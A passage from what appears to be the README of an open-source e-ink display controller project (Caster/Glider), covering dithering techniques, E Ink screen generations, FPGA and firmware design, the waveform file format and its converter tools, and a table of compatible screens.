供更優化的性能及更好的視覺體驗給客戶)" in V. Operational Highlights, 5.1 Business Activities, 5.1.2 Industrial Overview, 3. Product Developmenet Trends, A. eReader. This means we might be able to see more Gallery 3 (or similar technology) based eReaders in the years to come.
### Dithering
Eink and DES panels typically only support up to 16 levels of greyscale with the vendor-provided waveform. To improve response time, or to avoid flashing images, a binary (1-bit, 2-level) display is also used. Dithering could be applied to produce better images (increasing SNR, in signal processing sense).
The following is applying dithering to a simple black-to-white gradient. Note the results are not optimal due to limitations in quantization and incorrect gamma correction. But the idea is the same.
| Original | Binary No-dithering | 2 Row Sierra Dithered |
|-|-|-|
| ![original](assets/grad_orig.png) | ![nodither](assets/grad_no_dither.png) | ![errordiffusion](assets/grad_ed.png) |
Dithering can help when the screen has a native 16-level greyscale as well:
| Original | 16 Level Greyscale No-dithering | 16 Level Greyscale Dithered |
|-|-|-|
| ![original](assets/grad_orig.png) | ![nodither](assets/grad_4bpp_nd.png) | ![errordiffusion](assets/grad_4bpp_ed.png) |
As you can see, the non-dithered image loses all the greyscale in between, while the dithered version on the right gives the illusion of greyscale while only using full black and full white colors.
To understand it further, take the following example:
Say the source image is 30% brightness (or 0.3). This cannot be displayed on a binary screen which can only display 0% (0.0, black) or 100% (1.0, white) brightness. A simple thresholding process is added to determine if the screen should display 0 or 1 by checking the incoming brightness. If it's less than 0.5 then the display brightness is rounded down to 0, otherwise 1. Because 0.3 is always lower than 0.5, the whole screen displays 0 (black).
This is less than ideal. A better way is to set around 30% of the pixel black, while 70% of the pixel white. Different dithering algorithms can be used to achieve this 30/70 distribution. Two common methods used are ordered dithering and error-diffusion dithering, which will be described below.
#### Ordered Dithering
The ordered dithering adds a pre-computed/ fixed texture to the image before the thresholding process. In other words, it basically adds some noise to the image. This may sound weird initially, but it should be easy to see the effect of noise in the example.
Using the example previously described displaying 30% brightness grey on a binary screen. The goal is to let the rounding process end up with 0 for 30% of the time and 1 for 70% of the time. This could be achieved by adding a noise. In the simplest case, a random number with a uniform distribution between [-0.5, 0.5] is added to the incoming brightness. The brightness has a value of 0.3, when adding this number to the random number, the random number now has a uniform distribution between [-0.2, 0.8]. The threshold is still set to 0.5, and now the probability distribution can be seen as below:
![pdf](assets/dithering_pdf.svg)
The pixel now has a 30% chance of being rounded up to 1, and a 70% chance of being rounded down to 0. Before dithering, it would always be rounded down to 0.
However, a purely random number is generally not the best noise to use. Bayer dithering matrix and blue noise are more commonly used, with the results as illustrated below. The idea is the same, but instead of adding random numbers, a pre-computed number from the Bayer dithering matrix (array) or blue noise texture (array) is added to the image.
| Random Dithering| Bayer Dithering | Blue-noise Dithering |
|-|-|-|
| ![random](assets/grad_rand.png) | ![bayer](assets/grad_bayer.png) | ![bluenoise](assets/grad_bn.png) |
#### Error-Diffusion Dithering
The basic idea is when rounding down the color (selecting the closest color from the 16-level greyscale from 256-level input), the error value (difference) is calculated and added to neighboring pixels (so this error would be considered when processing these pixels later). The whole process is called error-diffusion.
Still using the previous example of a 30% brightness image, and assume an extremely simple dither kernel: diffuse all error to the next pixel. Let's see it in action.
In the first pixel, 0.3 (image brightness) is less than 0.5 (threshold), so it's displayed as 0 (black). This introduces a 0.3 error: the displayed color is 0.3 darker than the requested color. So 0.3 is being diffused to the next pixel, hoping the next pixel can correct the error.
Onto the second pixel. The value is 0.3 (image brightness) + 0.3 (diffused error) = 0.6. It's now larger than 0.5 (threshold), so it's displayed as 1 (white). This introduces a -0.4 error: the displayed color is 0.4 brighter than the requested color. -0.4 will be diffused to the next pixel.
For the 3rd pixel, the value is now 0.3 - 0.4 = -0.1. This is less than 0.5 and displayed as 0 (black). Error -0.1 is diffused further.
And this process just goes on. With enough pixels, eventually, it would yield about 30% of white pixels and 70% of dark pixels.
Similar to how random value is not the best thing to do in ordered dithering, dithering to the right is also less than ideal. It creates very repetitive patterns. I mentioned the word kernel. Error diffusing uses a diffusion kernel, which specifies the target and percentage of the diffused error. There are many classic kernels, such as Floyd-Steinberg, Stucki, Sierra, etc. commonly used for image dithering. They all diffuse to more than 1 pixel to improve the overall look of the image. As shown below, even just diffusing the error to 2 pixels (half of the error goes to the pixel on the right, and the rest half of the error goes to the pixel on the bottom) yields a much better result:
| Dither to Right | Right and Down | Floyd-Steinberg |
|-|-|-|
| ![right](assets/grad_naive.png) | ![rightdown](assets/grad_naive2.png) | ![fs](assets/grad_fs.png) |
#### Applying Dithering on CFA-based Color Screens
Dithering can be applied on CFA-based color screens such as Eink Kaleido and color DES screens as well. The following is on a simulated DES screen: (The left original is assuming the screen has a native 24bpp color, still on a simulated screen)
| 16M color DES (does not exist) | 8-color DES | 8-color DES Dithered |
|-|-|-|
| ![original](assets/color_8bpp.png) | ![nodither](assets/color_nd.png) | ![errordiffusion](assets/color_ed.png) |
Ordinary dithering kernels don't work too well on color screens. For example, the error-diffusion dithering process pushes/ diffuses error neighboring pixels without considering their color. Ideally, it should push/ diffuse the error only to pixels with the same color. This is fairly easy to fix though, by tweaking the kernel it would achieve good results on CFA-based screens as well. (I am going to shamelessly call it Wenting's kernel)
| 16M color DES (does not exist) | 8-color DES naively apply Floyd-Steinberg (wrong) | 8-color DES with Wenting's kernel |
|-|-|-|
| ![original](assets/color_8bpp.png) | ![original](assets/color_fs_wrong.png) | ![errordiffusion](assets/color_ed.png) |
Of course, one can apply Bayer-like ordered dithering, blue noise dithering, or dithering on 4096-color mode as well:
| 8-color DES Bayer-like | 8-color DES Blue-noise | 4096-color DES Error-diffusion |
|-|-|-|
| ![original](assets/color_bayer.png) | ![original](assets/color_bn.png) | ![errordiffusion](assets/color_4bpp_ed.png) |
It's called bayer because, similar to how naively doing error diffusion doesn't work, the bayer matrix has to be modified to work on the color screen.
#### Gamma Correction
Another thing to consider is gamma. The dithering process involves a step of selecting the closest value. However, selecting the closest numerical value does not necessarily mean the closest color. The image typically is in sRGB space, which is non-linear. This causes the simple rounding to pick the wrong color, also calculating the wrong error value. One solution is to work in the linear space. This is also known as gamma-aware dithering. You could read more related info online, for example here: [https://learnopengl.com/Advanced-Lighting/Gamma-Correction](https://learnopengl.com/Advanced-Lighting/Gamma-Correction).
![dither-gamma](assets/dither_gamma.jpg)
The difference is quite evident when dithering down to 1 bit for a color screen. The top left is the original image, the top right is dithering in the sRGB space, and the bottom left is dithering in the linear space.
#### Further Reading
See [https://en.wikipedia.org/wiki/Dither](https://en.wikipedia.org/wiki/Dither) for more information about dithering.
### Eink Screen Generations
Depending on how you count, there are multiple generations of Eink screens commercially available. For monochrome screens before 2023, it's possible to tell the generation by looking at the 6th digit on the serial number:
![eink_serial](assets/eink_serial.jpg)
That is the FPL code in the following table:
| FPL Platform | FPL Code | Panel Model | Marketing Name | First Introduced |
| ------------ | -------- | -------------- | ----------------------- | ---------------- |
| 2.0 | 0 | | | ? |
| 2.1 | 1 | | | 2004 |
| 2.3 | 2 | | | ? |
| V100 | 3 | | Vizplex | 2007 |
| V110 | 4 | | Vizplex | 2008 |
| V110A | 5 | | Vizplex | 2008 |
| V220 | 6 | VA3200 | Pearl | 2010 |
| V250 | 7 | | Pearl | ? |
| V220E | 8 | | Pearl | ? |
| V320 | 9, R | VB3300 | Carta 1.2 / 1000 | 2013 |
| V320 | ? | VB3300? | Carta 1100 | 2019 |
| V400 | A, C | VD1400/ VD1405 | Roadrunner / Carta 1200 | 2021 |
| V450 | ? | VH1948 | Carta 1250 | 2021? |
| ? | ? | VD1405 | Carta 1300 | 2023 |
Data points used to create the table above:
- The first commercialized Eink e-reader SONY Librie hit the market in 2004, *likely* with an ED060SC1 panel
- ED060SC1 has an FPL code of 1 on the barcode, meaning the 2.1 platform
- Multiple datasheets (like the one for ED060SC4) confirms the 6th digit marks the FPL code with mapping for V220/220E/320/400
- Inkwave's WBF decoder (originated from Kindle GPL kernel code) provides an FPL platform to an FPL code mapping table that matches well with info from the datasheet
- Kindle Oasis3 was reported to use a Carta 1100 screen, and it has an ED070KC3 screen with a V320 FPL platform
- Kindle PW5 was reported to use a Carta 1200 screen, and it has an ED068KC5 with a VD1405 panel model
- Kobo Clara BW was reported to use a Carta 1300 screen, and it has an ED060KHE with a VD1405 panel model
- The datasheet of ED068KC1 mentioned the name "Roadrunner" for the 400 platform, but that name never gets used outside of that. I would guess they were going to use the Roadrunner for the new generation but eventually fell back to Carta 1200 so it's more like an incremental improvement
- From the information available, it really looks like Carta 1000 and 1100 use the same film, and Carta 1200 and 1300 use the same film. If this is true, it may sound like a scam if they are named differently but use the same film. But this is actually okay. Just like how chips usually have a binning process, the same chip would sell under different product names with different performance levels. It's reasonable for Eink to do incremental improvements on the manufacturing process to yield better screens with the same film and call it under a different name, or simply binning screens to different grades and selling under different names.
I will let you decide how to count the generations.
For the CFA-based screens, the following generations of screens exist:
- Eink Triton: First generation color screen. Uses an RGBW glass color filter and square pixels. The underlying screen panel uses Pearl film.
- Eink Triton 2: 2nd generation color screen. Uses RGB glass color filter and stripe pixel. The underlying screen panel uses Pearl film.
- Eink Kaleido: 3rd or 2nd gen color screen depending on the definition. Uses an RGB color filter. Each pixel is still square, but each color covers 3 pixels. The underlying screen panel uses Carta film.
- Eink Kaleido Plus: 2nd gen Kaleido. Uses an RGB color filter. Each pixel is still square but different configurations exist. Some screens have each color covering 2 pixels, some others have each color covering only 1 pixel. The underlying screen panel uses Carta film.
- Eink Kaleido 3: 3rd gen Kaleido. There are at least 2 different configurations exist. One features RGB filter covering 1 pixel per color, the other features a 2R/2G/1B configuration, on average 5/3 pixels per color. The underlying screen panel uses Carta 1000/1200/1250/1300 film depending on the model.
- Eink Kaleido 3 Outdoor: Wide temperature version of Kaleido 3.
As far as I know, all CFA-based color screen panels don't come with an integrated controller.
For the multiple-pigment color screens based on SiPix technology, the following generations of screens exist:
(Color abbreviation: B: black, W: white, R: red, Y: yellow, B: blue, C: cyan, M: magenta)
- Eink Spectra 3000: BWR or BWY 3 color screen.
- Eink Spectra 3100: BWRY 4 color screen.
- Eink Spectra 3100 Plus: BWRY 4 color screen. The orange display is now possible with driver circuit changes
- Eink Spectra 6: RYBW 4 color screen. Can reproduce 6 different colors by mixing colors
- Eink Spectra 6 Plus: RYBW 4 color screen. Still reproduces 6 different colors. Allows faster refresh compared to 6 with driver circuit changes
- Eink Gallery (also known as Gallery 4000): CMYW 4 color screen (ACeP).
- Eink Gallery Plus (also known as Gallery 4000): CMYW 4 color screen (ACeP).
- Eink Gallery Palette (also known as Gallery Palette 4000): CMYW 4 color screen (ACeP). Reproduce 7 different colors.
- Eink Gallery 3: CMYW 4 color screen (ACeP). Reproduce around 10 different colors, much faster than other Gallery screens at the cost of lower saturation and lower reflectivity
There are both integrated-controller Spectra/Gallery screens and controller-less Spectra/Gallery screens.
Additional notes regarding the multi-pigment color screens:
- ACeP, or Advanced Color ePaper refers to the CMYW 4 color screen. Is not a product line on its own
- To be honest, I don't know how many colors can be reproduced on Gallery or Gallery Plus screens based on public information. The spec sheets for [AC133UT1](https://www.beck-elektronik.de/fileadmin/user_upload/Produkte/BECK_Elektronik/Displays/Downloads/EPD/E-Ink/AC133UT1_Specs.pdf?v=1662907755) suggests it might be 8 colors. Eink claims 32000 or 60000 colors in their materials, but they also clarified these numbers refer to color gamut. In other words, they represent color saturation rather than a number of different colors that can be displayed on screen. Dithering is heavily used to display color images on Gallery screens.
- It's possible to achieve more colors on Gallery Palette screens. 7 is not a physical limit.
- The Gallery 4000 rebranding happened in [2020](https://www.linkedin.com/pulse/e-ink-gallery-4000-anna-rybalko/) however Eink never seems to use that name on their website.
## Design of Caster and Glider
This section describes the design specific to the Caster and Glider. The following is an overall block diagram showing both hardware and gateware components in the signal chain:
![Overall ABlockdiagram](assets/glider_overall_block_diagram.svg)
### Gateware Architecture
The FPGA gateware is divided into multiple modules. The caster.v is the top-level of the EPDC core design, but several additional components are connected under top.v to form a complete image processing system. Different components are generally inter-connected with synchronous or asynchronous (in case of clock domain crossing) FIFOs.
The top-level design has 3 major clock domains: clk_vi: Input video clock domain, running at ½ pixel rate. clk_epdc: EPDC clock domain, running at ¼ pixel rate. clk_mem: Memory clock domain, running at ¼ memory transfer rate.
To understand how it works, the following is a guided tour around the life cycle of a pixel.
Before an incoming pixel can be processed by the controller, the memif module needs to retrieve the local pixel state from the DDR SDRAM. Once the value is retrieved, it’s pushed into the state readout/ input FIFO (bi_fifo). At/ around the same time, the input video stream is pushed into the video input FIFO (vi_fifo).
The EPDC runs a local Eink timing generator for counting pixels and blankings. This timing should be a slightly delayed version of the incoming video timing. Once the local timing generator determines that it needs to output the pixel soon, the EPDC logic pops out one pair of the video input and state readout and starts processing.
Two values go through the video processing pipeline:
- Stage 1: This pipeline stage waits for the FIFO to output the data.
- Stage 2: The 8-bit input image is dithered down to 1-bit and 4-bit at this stage for later use.
- Stage 3: The waveform lookup is done at this stage for 16-level grayscale modes
- Stage 4: Based on the pixel state, the new state and voltage selection value are determined at this stage.
- Stage 5: The new state is pushed into the state writeback/ out FIFO (bo_fifo) and the voltage selection is sent to the screen.
The memif module later pops out the writeback value from the bo_fifo and writes it back to the DDR SDRAM.
The EPDC always processes 4 pixels per clock. For screens with different interface widths, a rate adapter is added after the EPDC output. Some logic is duplicated 2 or 4 times (such as the waveform RAM or the pixel decision logic), while some are extended and daisy-chained (such as the error diffusion dithering unit) to achieve the 4 pixels per clock throughput.
### Firmware Functions
The MCU manages housekeeping items as described below. It currently doesn’t use any operating system but rather relies on a main-loop style operation.
- EPD Power Supply: The power supply provides a common, source, and gate supply to the EPD panel. In addition to a basic on/off switch, the MCU can also adjust the VCOM voltage, and measure the optimal VCOM voltage of the panel installed. The VCOM measurement is done by isolating the VCOM supply from the screen while keeping the gate supply, scanning the screen with source = VCOM, and measuring the kick-back voltage on the VCOM.
- FPGA Bitstream Loading: The FPGA doesn’t have its own flash memory, the bitstream is pushed over SPI from the MCU to the FPGA upon powering up. In this way, the FPGA bitstream can be easily bundled together with the MCU’s firmware and updated together.
- Type-C Negotiation: The onboard USB Type-C port can support video input in addition to powering the board using the USB-C DisplayPort Alt Mode. The MCU runs a USB-C PD stack to communicate this capability to the video source device over standard USB PD protocol. The MCU also controls the Type-C signal mux to remap the lanes to the correct place depending on the cable orientation.
- Video decoder initialization: The FPGA used on the board doesn’t have high-speed deserializers to interface with common high-speed video interfaces such as DisplayPort or DVI directly. Instead, dedicated video decoder chips are used on the board. They typically need initialization before use, and the MCU takes care of this. In this specific design, the DP decoder chip also handles AUX P/N line flipping based on the Type-C cable orientation.
- PC communication: One advantage of the Caster is that update modes and forced update/ clearing can be applied on a per-pixel basis. Software may utilize this to assign different modes to different windows or change update modes depending on the content on the fly. This is done by sending requests to the MCU over a USB connection. The MCU runs TinyUSB and presents itself as an HID device so it can forward messages between the host PC and the FPGA.
### Low Latency Drive
The Caster implements several techniques for reducing the latency, which will be explained here.
As described before, the existing basic driving method employs a global counter for looking up the waveform table. This imposes a limit on the global image update rate: the controller only accepts a new incoming image after the previous update is finished. The update usually takes about 100ms, translating to an image rate of 10Hz. Or, in other words, the user needs to potentially wait up to 100ms before the new image is even processed by the controller.
One way to mitigate this issue is by having multiple update regions. For example, imagine the user is typing a and b. In a single region controller design, a is drawn to the screen immediately, while the b needs to wait 100ms before it gets drawn. If the controller supports multiple regions, it could start drawing the letter b as soon as it’s typed, reducing the latency. This however requires the software to program the controller to correctly set the region to the letter boundary, and re-allocating regions on the fly as the number of regions is generally quite limited (like 4-16).
![caster-pipelined](assets/caster_pipelined_update.svg)
The Caster simply treats every pixel as an individual update region, for maximum flexibility and is transparent to the software.
Another latency optimization technique the Caster implemented is on the pixel that’s already being updated. For example, if the user types the letter a and deletes it right after. With the basic driving method, the controller needs to wait till the letter a is fully displayed before it can erase it. The previously proposed/ implemented regional update doesn’t help here because in this situation it’s about the same pixel so it has to be in the same region. The second technique is early cancellation. If a pixel changes before it’s fully driven, instead of waiting for it to be fully driven, it’s driven toward the requested input state, and the frame counter is updated depending on the newly calculated driving time.
![caster-early-cancel](assets/caster_early_cancel.svg)
By combining both, it’s then possible to implement low-latency binary and 4-level grayscale modes. The tradeoff between framerate and contrast ratio is also no longer relevant. Both a high frame rate and high contrast ratio are achieved automatically.
### Hybrid Greyscale Mode
As discussed previously, getting [greyscale](#greyscale-display) image on Eink is a sophisticated process, much slower than binary, and shows flashing images during the process. This poses challenges on how to make it useful for the users.
On eReaders, the software could switch between fast and slow modes based on the action. The eReader software may also simply not support things that don’t work well on the screen. For example, there might be no scrolling but only whole page flipping. What’s being done on existing eink monitors is throwing the problem back to the user. The user simply needs to accept that the update is slow, the latency is long, and the process is flashing.
What Caster implemented is allowing it to switch between the fast binary mode and slow greyscale mode automatically on a per-pixel basis. When the input image is changed, it switches to binary mode and does the update. When the image hasn’t changed for a while, it re-renders the image in greyscale.
### Limitations
The method does come with downsides: it requires much more memory bandwidth to implement. Taking a 1080P panel as an example (roughly 120 Mp/s (million pixels per second) with reduced blanking). With the traditional method, the controller only needs the old pixel state and the new pixel state (4bpp each) to determine the voltage needed or 8-bit/ 1-byte memory read per pixel. The bandwidth requirement is then 120Mp/s x 1B/pixel = 120MB/s. One single 16-bit SDR-133 SDRAM is more than enough to handle this. The Caster currently stores a 16-bit state per pixel (for 2 sets of old pixel values and pixel-specific timer counters), and the pixel state needs to be updated per frame, so the pixel state buffer alone requires 2-byte read and 2-byte write per pixel. It then takes another 0.5-byte per pixel to read the new image value from memory. 120Mp/s x 4.5B/pixel = 540MB/s. A 16-bit DDR-333 memory is then needed to implement this. The Glider hardware uses a DDR3-800 memory to allow even higher resolution. If the controller is not integrated inside an SoC (like our case, the controller is sitting inside the monitor, not part of your PC’s CPU/GPU), it also needs to use actual low latency video interfaces like DVI or DP, instead of simpler but slower interfaces like USB or I80/SPI. This could drive up costs as well. These techniques also don't help with use cases like reading books, so commercial e-reader solutions have little reason to spend the extra trouble to implement these.
### Hardware Design Decisions
To be written (TODO)
### Resources Utilization
The following numbers are for reference only and would vary depending on RTL options and specific targets.
- 1704 FF
- 2531 LUT6
- 60 KB BRAM
## Building
### PCB
The PCB is designed with KiCAD 8.0. To get optimal results, use a 4-layer stack up with 1080 PP layers, but 2313 or 3313 are also acceptable.
There are 2 versions of the mainboard, one full version, and a lite version. For now, only the full version is being actively worked on. The lite version removes dedicated external decoders for DVI/ DP and removes the bulk of the TypeC circuitry to lower the cost. The only video interface is a DVI port feeding directly into the FPGA.
### FPGA Bitstream
To be written (TODO)
### MCU Firmware
To be written (TODO)
### Working with Waveforms
The following section describes the waveform file format and how to use it.
#### Obtaining Waveform
In general, the screen vendor (Eink, Good Display, etc.) should provide the waveform file.
If your screen has a flash chip on it, it's also possible to extract the waveform from a flash dump:
```dd if=somedump.bin of=waveform.wbf bs=1 skip=2182```
If you have access to an application board, it might also be possible to extract the waveform there. For example, if the system uses a T1000 controller, the waveform is usually stored in the SPI flash connected to the T1000.
#### Waveform Formats
E-Ink distributes waveforms in the wbf file format. SoC/ Eink controller hardware often requires converting the file into a vendor-specific file format. Caster/ Glider also uses a specific binary format. This project defines a common human-readable format (Interchangeable Waveform Format, IWF) and provides several tools for working with different binary formats and the IWF format.
#### Interchangeable Waveform Format
The waveform consists of one descriptor file in iwf extension (ini format) and various lut data files in csv format.
The descriptor contains the following required fields:
- VERSION: the version of the descriptor (should be 2.0)
- NAME: (optional) original name for the waveform
- BPP: (optional, default 4) 4 or 5, representing the internal state count used for waveform
- PREFIX: the filename prefix for actual waveform files
- MODES: the total modes supported by the waveform
- TEMPS: the total number of temperature ranges supported by the waveform
- TxRANGE: the supported temperature in degC, where x is the temperature ID
- TUPBOUND: (optional) upper bound for temperature range, each range is TxRANGE to Tx+1RANGE (or TUPBOUND in case of the last one)
- TABLES: total number of LUTs inside the waveform
- TBxFC: the frame count for the table, where x is the LUT ID
Each mode has its own mode section named [MODEx], where x is the mode ID, containing the following fields:
- NAME: the name for that mode
- T*TABLE: the table used for the temperature in that mode
There should be a number of LUTs, saved in the filename like PREFIX_TBx.csv, where x is the LUT ID. Each csv file should contain a LUT like this: lut[src][dst][frame], which means, to transition from src greyscale level to dst greyscale level, at a certain frame in a frame sequence, what voltage should be applied to the screen (0/3: GND / Keep, 1: VNEG / To black, 2: VPOS / To white). Each line contains the frame sequence for one or more source-to-destination pairs.
For example:
- ```4,7,1,1,1,0,2``` means to transition from greyscale level 4 to greyscale level 7, there should be 5 frames, each applying VNEG VNEG VNEG GND VPOS
- ```0:14,15,2,2,2``` means to transition from any greyscale level between 0 and 14 to greyscale level 15, there should be 3 frames, each applying VPOS VPOS VPOS
These are provided to only illustrate the file format, they are not valid or meaningful Eink driving sequences.
#### Converting
The following converters are provided in the repo:
- To convert from iwf to fw (iMX6/7 EPDC format): ```./mxc_wvfm_asm v1/v2 input.iwf output.fw```
- To convert from fw to iwf: ```./mxc_wvfm_dump v1/v2 input.fw output_prefix```
- To convert from wbf to iwf: ```./wbf_wvfm_dump input.wbf output_prefix```
### Compatible Screens
This project only focuses on driving off-the-shelf active matrix electrophoretic displays without integrated controllers. See [Screen Panels](#screen-panels) for differences between different types of screen panels available. That being said, this project is compatible with the majority of these panels, including sizes from 4.3" up to 13.3", and potentially supporting panels as large as 42" as well (additional power supply required in that case).
#### Screen Adapters
Different screen panels have different connectors. It would take a huge amount of space to have every possible screen connector on the motherboard. Instead, a series of different screen adapters are provided to adapt to the screen with different pinouts.
The mainboard natives support certain 40-pin screens, such as:
- 10.3" 1872x1404: ED103TC1, ES103TC2
- 10.1" 2232x1680: GDEW101M01, GDEW101C01
To see which adapter might work for your screen, check out the [Appendix 1 - Screen List](#screen-list)
#### Pixel Rate Considerations
The input protocol and processing rate limit the screen model supported.
Limit from processing rate (logic and routing delay):
* Processing rate when dithering enabled: 133 MP/s
* Processing rate when dithering disabled: 280 MP/s
* Estimated processing rate with 8-wide design: 500 MP/s
Limit from video interface:
* Maximum pixel rate using DVI (with ADV7611): 165 MP/s
* Maximum pixel rate using DVI (direct deserializer): 105 MP/s
* Maximum pixel rate using DisplayPort (with PTN3460): 224 MP/s
* Maximum pixel rate using DisplayPort (with 7-series 6G SerDes): 720 MP/s
* Maximum pixel rate using MIPI (with 1.05Gbps LVDS): 230 MP/s
Limit from memory interface (assuming 90% BW utilization):
* SDR-166 x16: 60 MP/s
* SDR-166 x32: 120 MP/s
* DDR-400 x16: 180 MP/s
* DDR2/3-667 x16: 300 MP/s
* DDR2/3-800 x16: 360 MP/s
* DDR2/3-1066 x16: 480 MP/s
* DDR2/3-800 x32: 720 MP/s
Common screen resolution peak pixel rate (with CVT-RBv2):
* 1024x758 (6.0") @ 85Hz: 74 MP/s
* 1448x1072 (6.0") @ 60Hz: 101 MP/s
* 1448x1072 (6.0") @ 85Hz: 145 MP/s
* 1600x1200 (13.3") @ 60Hz: 125 MP/s
* 1600x1200 (13.3") @ 85Hz: 178 MP/s
* 1872x1404 (10.3") @ 60Hz: 169 MP/s
* 1872x1404 (10.3") @ 85Hz: 243 MP/s
* 1920x1440 (8.0") @ 60Hz: 177 MP/s
* 1920x1440 (8.0") @ 85Hz: 255 MP/s
* 2200x1650 (13.3") @ 60Hz: 232 MP/s
* 2200x1650 (13.3") @ 85Hz: 333 MP/s
* 2560x1600 (12.0") @ 60Hz: 261 MP/s
* 2560x1600 (12.0") @ 85Hz: 374 MP/s
* 2560x1920 (13.3") @ 60Hz: 313 MP/s
* 2560x1920 (13.3") @ 85Hz: 449 MP/s
* 3200x1800 (25.3") @ 60Hz: 364 MP/s
* 3200x1800 (25.3") @ 85Hz: 522 MP/s
( Calculate yourself: [Video Timings Calculator by Tom Verbeure](https://tomverbeure.github.io/video_timings_calculator) )
Rendering the grayscale requires the screen to be refreshed at 85Hz (85Hz is the supported refresh rate by Eink, 60Hz can be made to work with some effort in some cases). Running an input refresh rate lower than the internal refresh rate incurs additional processing latency from both source (PC) and monitor due to buffering.
### Case
A reference case design is provided. The case is 3D printable and designed with FreeCAD. Note the design is currently outdated.
## References
Here is a list of helpful references related to driving EPDs:
* Reverse engineering and explanation on driving EPDs: http://essentialscrap.com/eink/index.html
* An early Eink DIY project with many useful info: http://spritesmods.com/?art=einkdisplay&page=1
* STM32 Software bit-banging EPD driver with grayscale: https://hackaday.io/project/11537-nekocal-an-e-ink-calendar
* ESP32 board designed for driving parallel EPDs: https://github.com/vroland/epdiy
* An early tool for reading Eink's wbf file format: https://github.com/fread-ink/inkwave
* A more up-to-date Eink's wbf format parser: https://patchwork.kernel.org/project/linux-arm-kernel/patch/20220413221916.50995-2-samuel@sholland.org/
On the topic of color screen resolution, color mapping, and subpixel rendering:
* Klompenhouwer, Michiel A., and Erno H. A. Langendijk. “59.4: Comparing the Effective Resolution of Various RGB Subpixel Layouts.” SID International Symposium Digest of Technical Papers, vol. 39, no. 1, 2008, pp. 907–10, https://doi.org/10.1889/1.3069822.
* Lai, Chih-chang, and Ching-chih Tsai. “A Modified Stripe-RGBW TFT-LCD with Image-Processing Engine for Mobile Phone Displays.” IEEE Transactions on Consumer Electronics, vol. 53, no. 4, 2007, pp. 1628–33, https://doi.org/10.1109/TCE.2007.4429262.
## License
This document, other than references explicitly given with their corresponding license, is released into the public domain.
The hardware design is released under the CERN Open Source Hardware License strongly-reciprocal variant, CERN-OHL-S. A copy of the license is provided in the source repository. Additionally, a user guide of the license is provided on ohwr.org.
The firmware code is licensed under the MIT license with the following exceptions:
The USB PD library is derived from the Chromium OS project and the reclamier labs. The library is licensed under the BSD license.
## Appendix
### Using Screens without Datasheet
To be written
### Screen List
This is a list of Eink screens their key parameters and their compatibilities with Caster/ Glider. The information is gathered from public sources, so they might be incorrect. This is not a complete list of all screens Eink has ever produced or is in production. This table is intended for hobbyists buying used screens. If you are designing a product with Eink screen please contact Eink directly.
Other than a few exceptions, only screens without integrated TCON are listed here (in other words, SPI screens are generally not included here). These screens are the main focus of this project anyway.
Screen size is the first 3 numbers in the model number, so it's not listed separately in the table. For example, ED060SC4 is 6.0", ED097OC1 is 9.7", and ES133UT1 is 13.3".
The adapter column refers to the adapter needed for this particular screen, however, there is no guarantee that it would work, even if it's listed as tested.
| Model Name | Model Number | FPL Platform | Resolution | Marketing Name | R Typ | CR Typ | Year | Interface | Pin Count | Adapter | Tested? |
| ---------- | ------------ | ------------ | ----------- | --------------------------- | ----- | ------ | ----- | --------- | --------- | ------- | ------- |
| ED038TH1 | | V320 | 600x600 | Carta | 45% | 17:1 | 2015 | TTL | 34 | 34P-A | |
| ET040TC1 | | | 720x480 | Pearl | | | | TTL | | | |
| ET040TC2 | | | 720x480 | Pearl | | | | TTL | | | |
| ED043WC1 | | V220 | 800x480 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-C | |
| ED043WC3 | VA3200-DCA | V220 | 800x480 | Pearl | | | 2014 | TTL | 39 | 39P-C | |
| ED043WC5 | VD1405-CGA | 400 | 800x480 | Carta 1200 | | | | SPI | | | |
| ED047TC1 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2015 | TTL | 44 | | |
| ED047TC2 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2016 | TTL | 44 | | |
| ET047TC1 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | |
| ET047TC2 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | |
| ED050SC3 | | V110 | 800x600 | Vizplex | 35% | \>6:1 | 2008 | TTL | 33 | 33P-A | |
| ED050SU3 | | V220 | 800x600 | Pearl | | | | TTL | 39 | | |
| ED052TC2 | | 320 | 960x540 | Carta | 45% | 16:1 | 2016 | TTL | 40 | | |
| ED052TC4 | VB3300-EBA | 320 | 1280x720 | Carta 1.2 | 45% | 16:1 | 2017 | TTL | 50 | | |
| EC058TC1 | SA1452-EHA | 320 | 1440x720 | Kaleido / Carta | 24% | 15:1 | 2020 | TTL | 50 | | |
| ED058TC7 | | 320 | | Carta | | | | TTL | | | |
| ED058TC8 | VB3300-EHB | 320 | 1440x720 | Carta | | | | TTL | | | |
| ED060SC1 | | 2.1 | 800x600 | | | | | TTL | 39 | 39P-B | |
| ED060SC3 | | V100 | 800x600 | Vizplex | | | | TTL | 39 | 39P-B | |
| ED060SC4 | | V110 | 800x600 | Vizplex | 35% | \>6:1 | 2008 | TTL | 39 | 39P-B | |
| ED060SC7 | | V220E | 800x600 | Pearl | 40% | 12:1 | 2010 | TTL | 34 | 34P-B | |
| ED060SCA | | V110 | 800x600 | Vizplex | | | | TTL | | | |
| ED060SCE | | V220/V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | |
| ED060SCF | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCG | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | |
| ED060SCN | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCS | | | 800x600 | | | | | TTL | 34 | 34P-B | |
| ED060SCP | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | |
| ED060SCQ | | V220 | 800x600 | Pearl | | | | TTL | | | |
| ED060SCS | | | 800x600 | | | | | TTL | | | |
| ED060SCT | | 320 | 800x600 | Carta | | | | TTL | 34 | 34P-B | |
| ED060SD1 | | 320 | 800x600 | Carta | | | | TTL | | | |
| ED060XC3 | | V220 | 1024x758 | Pearl | | | | TTL | 34 | 34P-A | Yes |
| ED060XC5 | | V220 | 1024x758 | Pearl | 35% | 12:1 | 2011 | TTL | 34 | 34P-A | |
| ED060XC8 | | V320 | 1024x758 | Carta | | | | TTL | 35 | 35P-A | Yes |
| ED060XC9 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XCD | | 320 | 1024x758 | Carta | | | | TTL | | | |
